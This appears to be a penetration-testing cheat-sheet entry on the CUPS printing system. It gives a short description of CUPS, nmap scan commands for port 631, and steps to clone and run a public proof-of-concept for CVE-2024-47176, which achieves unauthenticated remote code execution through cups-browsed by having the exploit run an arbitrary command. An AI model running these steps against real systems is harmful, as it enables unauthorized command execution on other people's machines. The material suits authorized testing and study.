Brief
CUPS (formerly an acronym for Common UNIX Printing System) is a modular printing system for Unix-like computer operating systems which allows a computer to act as a print server. A computer running CUPS is a host that can accept print jobs from client computers, process them, and send them to the appropriate printer. CUPS consists of a print spooler and scheduler, a filter system that converts the print data to a format that the printer will understand, and a backend system that sends this data to the print device. CUPS uses the Internet Printing Protocol (IPP) as the basis for managing print jobs and queues.
Scanning
# run all cups-related nse scripts
nmap -sV -p631 --script=cups* $target
# lists printers managed by the CUPS printing service
nmap -sV -p631 --script=cups-info $target
# lists currently queed print jobs of the remote CUPS service grouped by printer
nmap -sV -p631 --script=cups-queue-info $targetExploit
CVE-2024-47176 - Unauthenticated RCE on cups-browsed
- Systems potentially vulnerable :
- The
cups-browsedpackage- ⇐ 2.0.1
- Is started/enabled and listening on
UDP 631
- To exploit these chain of vulnerability, an attacker has to trick an user into printing from a malicious printer server.
- The
- Install & exploit :
# install
git clone https://github.com/l0n3m4n/CVE-2024-47176.git
cd CVE-2024-47176
pip install zeroconf ippserver colorama
# exploit
python3 CVE-2024-47176.py -l $listener_ip -s $printer_spoof_name -p 631 -r $command_to_execute -t $target_ip